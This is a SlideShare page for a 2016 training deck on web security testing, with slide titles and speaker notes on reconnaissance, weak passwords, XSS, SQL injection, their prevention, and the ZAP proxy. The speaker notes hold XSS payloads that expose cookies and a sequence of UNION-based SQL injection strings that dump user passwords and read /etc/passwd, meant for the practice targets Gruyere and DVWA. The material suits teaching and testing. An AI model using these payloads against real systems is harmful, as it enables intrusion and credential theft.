Security testing operation vijay
Sep. 13, 2016•0 likes•383 views
Download to read offline
Report
Technology
Understand basics of testing security aspects like passwords, robots.txt. Understand SQL Injection and XSS attacks. Automation of them using ZAP proxy tool.
lavanyam210Follow
Recommended
TechEvent 2019: Security 101 für Web Entwickler; Roland Krüger - TrivadisTrivadis
Static analysis for securityFadi Abdulwahab
Nguyen Phuong Truong Anh - Some new vulnerabilities in modern web applicationSecurity Bootcamp
A5-Security misconfiguration-OWASP 2013 Sorina Chirilă
ASP.NET security vulnerabilitiesAleksandar Bozinovski
Phu appsec13drewz lin
More Related Content
What's hot
RSA Conference 2010 San FranciscoAditya K Sood
![[Wroclaw #6] Introduction to desktop browser add-ons](https://cdn.slidesharecdn.com/ss_thumbnails/owaspppt2wz-170531065551-thumbnail.jpg?width=384&height=256&fit=bounds)
[Wroclaw #6] Introduction to desktop browser add-onsOWASP
![[OWASP Poland Day] OWASP for testing mobile applications](https://cdn.slidesharecdn.com/ss_thumbnails/pawelrzepaowaspformobileapps-171003211503-thumbnail.jpg?width=384&height=256&fit=bounds)
[OWASP Poland Day] OWASP for testing mobile applicationsOWASP
Microsoft Fakes, Unit Testing the (almost) Untestable CodeAleksandar Bozinovski
Xss what the heck-!VodqaBLR
Introduction to OWASP & Web Application SecurityOWASPKerala
![[Wroclaw #6] Introduction to desktop browser add-ons](https://cdn.slidesharecdn.com/ss_thumbnails/owaspppt2wz-170531065551-thumbnail.jpg?width=1600&height=908&fit=bounds)
![[OWASP Poland Day] OWASP for testing mobile applications](https://cdn.slidesharecdn.com/ss_thumbnails/pawelrzepaowaspformobileapps-171003211503-thumbnail.jpg?width=1600&height=908&fit=bounds)
![[Wroclaw #2] Web Application Security Headers](https://cdn.slidesharecdn.com/ss_thumbnails/owaspwebapplicationsecurityheaders1-160429210343-thumbnail.jpg?width=1600&height=908&fit=bounds)
![[OWASP Poland Day] Application security - daily questions & answers](https://cdn.slidesharecdn.com/ss_thumbnails/owasp-applicationsecurity-171003211500-thumbnail.jpg?width=1600&height=908&fit=bounds)
Viewers also liked
Gatling Performance WorkshopSai Krishna
Mobile automation using appium.pptxSai Krishna
Increase automation to restShivaling Sannalli
Dmitriy Desyatkov "Secure SDLC or Security Culture to be or not to be"WrikeTechClub
Security_Testing_PresentationRazil Shaik
Matteo meucci Software Security - Napoli 10112016Minded Security
Similar to Security testing operation vijay
Security Testing - Zap ItManjyot Singh
Security testing zap itvodqancr
Top web apps security vulnerabilitiesAleksandar Bozinovski
XSS- an application security vulnerabilitySoumyasanto Sen
Web security for developersSunny Neo
Problems with parameters b sides-mspMike Saunders
Recently uploaded
The Ultimate Administrator’s Guide to HCL Nomad Webpanagenda
Supplier Sourcing_Cathy.pptxCatarinaTorrenuevaMa
Scaling out with WordPressKonstantin Kovshenin
UiPath Tips and Techniques for Error Handling - Session 2DianaGray10
Orchestration, Automation and Virtualisation Maturity ModelCSUC - Consorci de Serveis Universitaris de Catalunya
How resolve Gem dependencies in your code?Hiroshi SHIBATA
Security testing operation vijay
- 1. Security Testing Operation Vijay
- 2. What is hacking?
- 3. Hackers
- 4. Types of Hackers ● Ethical Hackers ● Crackers
- 5. Define Security Testing is a type of testing that intends to uncover vulnerabilities of the system and determine that its data and resources are protected from possible intruders.
- 6. Types of Security Testing ● Infrastructure Security Testing ● Application Security Testing
- 7. When?
- 8. Security Testing Vocabulary ● Reconnaissance/ Information gathering ● Vulnerability ● Exploit
- 9. Reconnaissance Demo
- 10. Reconnaissance Mission
- 11. P@ssw04d
- 13. Default / Weak Passwords
- 14. Password Vaults Demo
- 15. Cross Site Scripting Client side injection attack Types: Reflected XSS Stored XSS DOM based XSS
- 16. Reflected XSS Demo
- 18. Reflected XSS Mission
- 19. Stored XSS Demo
- 21. Stored XSS Mission
- 22. XSS Prevention Don’t use user input as-is Encoding X-XSS-Protection Response Header HttpOnly flag Response Header
- 23. Popular XSS Attacks
- 24. SQL Injection Attack where SQL commands are injected in order to affect the execution of predefined SQL commands
- 25. SQL Injection Demo
- 27. SQL Injection Prevention Don’t use user input directly Use prepared statements Use stored procedures Use frameworks
- 28. ZAP
- 29. References https://www.owasp.org https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project https://www.google.co.in/about/appsecurity/tools/ https://xkcd.com/327/ http://www.dvwa.co.uk/ https://www.amazon.in/Web-Application-Hackers-Handbook-Exploiting- ebook/dp/B005LVQA9S https://google-gruyere.appspot.com
- 30. Thank you Dhaval Doshi (@dhavaldoshi) Lavanya Mohan (@LavanyaMohan210) Shirish Padalkar (@_Garbage_)
Editor's Notes
- Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose
- Why do real hackers hack? What is their motivation? Money? Damage to opponent Fame Government does hacking to get information
- Also known as ethical hackers, White Hat hackers are the good guys of the hacker world. They’ll help you remove a virus or PenTest a company. Black Hat – Also known as crackers, these are the men and women you hear about in the news. They find banks or other companies with weak security and steal money or credit card information. The surprising truth about their methods of attack is that they often use common hacking practices they learned early on. Gray Hat – Nothing is ever just black or white; the same is true in the world of hacking. Gray Hat hackers don’t steal money or information (although, sometimes they deface a website or two), yet they don’t help people for good (but, they could if they wanted to). These hackers comprise most of the hacking world, even though Black Hat hackers garner most (if not all) of the media’s attention.
- Infrastructure Security Testing Hack windows machine to get full control Causing network to go down Application Security Testing JIRA installed on a local server
- When do you do security testing??? When should we do security testing?
- Reconnaissance - mission to obtain information by visual observation or other detection methods a vulnerability is a weakness which allows an attacker to reduce a system's information assurance Exploit - causing unintended or unanticipated behaviour to occur on computer software, hardware, or something electronic (usually computerised) by taking advantage of vulnerabilities
- http://www.hackingtheuniverse.com/ i don’t like these guys i want to do some damage how do i start hacking lets think any ideas??? Show them wappalyzer. It shows versions as well. If the version of some software they are using has known vulnerabilities, that can be exploited. Example: http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/ Show Wappalyzer Robots.txt Admin login screen Task ->
- http://www.hackingtheuniverse.com/ i don’t like these guys i want to do some damage how do i start hacking lets think any ideas??? Show them wappalyzer. It shows versions as well. If the version of some software they are using has known vulnerabilities, that can be exploited. Example: http://www.cvedetails.com/vulnerability-list/vendor_id-2337/product_id-4096/ Show Wappalyzer Robots.txt Admin login screen Task ->
- Ask for details of password It is recommended to use more than 8 characters in password. How many have less than 8 characters password for email? How many have only small case? Blah…. What would be your guess for their password What we were doing here is applying social engineering techniques to get to know your passwords or other important information. Can we really get details by just talking and not using a computer? Let’s see a video.
- https://www.youtube.com/watch?v=lc7scxvKQOo
- Default username and password like admin password for admin consoles. People use very common passwords (like password or just numbers, their names or dictionary words) 41% people use only lowercase password. Only about 4% use special characters in passwords 50% of people have password less than 8 characters in length (at least 8 is recommended)
- XSS attacks are type of injection attacks in which the attacker injects malicious code in web pages that are viewed by other users of the application.
- Basic using script tag Ask if you can just sanitize script tag.. Show how to bypass that -> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
- https://google-gruyere.appspot.com/536172483468/%3Cscript%3Ealert(document.cookie)%3C/script%3E https://google-gruyere.appspot.com/536172483468/feed.gtl?uid=%3Cscript%3Ealert(1)%3C/script%3E
- Ask if small text fields will prevent this attack Tell them about intercepting requests
- <a onmouseover="alert(1)" href="#">read this!</a> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);> Google Gruyere: Stored XSS: (New snippet) <a onmouseover="alert(1)" href="#">read this!</a> <img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
- HTML encoding (< → <) URL encoding before inserting it into HTML HTML attribute encoding CSS encoding This HTTP response header enables the Cross-site scripting (XSS) filter built into some modern web browsers. This header is usually enabled by default anyway, so the role of this header is to re-enable the filter for this particular website if it was disabled by the user. HttpOnly flag is included in the HTTP response header, the cookie cannot be accessed through client side script
- It happens when computers cannot tell difference between code and data
- 2 ' 2' # 2' OR 1=1 2' Union select null # 2' union Select null, null # 2' Union Select null, @@version # 2' Union Select null, database() # 2' union select null, table_name from information_schema.tables # 2' union select null, table_name from information_schema.tables where table_name like '%user%' # 2' Union select null, column_name from information_schema.columns where table_name='users' # 1' Union select null, concat(user, 0x0a,password) from users # 2' Union select null, LOAD_FILE('/etc/passwd') #
- https://www.google.co.in/about/appsecurity/tools/